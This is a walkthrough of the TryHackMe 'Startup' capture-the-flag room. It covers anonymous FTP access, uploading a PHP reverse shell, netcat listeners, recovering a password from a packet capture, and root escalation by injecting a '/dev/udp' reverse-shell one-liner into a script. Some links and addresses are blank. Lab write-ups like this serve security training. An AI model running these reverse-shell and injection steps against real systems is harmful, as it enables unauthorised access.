TryHackMe solution: Startup



#1 “What is the secret spicy soup recipe?

First, we use:

nmap -sC -sV

to find open ports in the machine.

Port 21 is open so we connect to the server through ftp.


Let’s try anonymous login with:

Name:     anonymous
Password: anonymous

There is a folder named ftp and we can upload a php-reverse-shell.php to the server (after changing the IP).

Using dirsearch and we found a folder named files.

And we found the location of our shell.

Stand up a netcat listener on port 1234.

nc -lvnp 1234

Then, we access the link:

to trigger a reverse shell.

Then we found a file named “recipe.txt” and it contains the first flag.


#2 “What are the contents of user.txt?

There is a folder /home/lennie but we cannot access it.

We found “suspicious.pcapng” file in /incidents.

We can host a http server with python here.

python3 -m http.server

Then, we access the link:

and download this file.

Open it with Wireshark, follow TCP Stream and we found a password.


python3 -c 'import pty; pty.spawn("/bin/sh")'

to spawning a TTY Shell.

Then use:

su lennie

with the password and we changed to lennie.

We can found the second flag.

Privilege Escalation

#3 “What are the contents of root.txt?

There is a folder named scripts.

Read file ““, we can see that lennie will execute file /etc/

Go to /etc and check for the files permission of, lennie is the owner.

Then, we will inject a code to this file.

sh -i >& /dev/udp/ 0>&1

Stand up a netcat listener on port 4242.

nc -lvup 4242

Then run file


And we found root flag.

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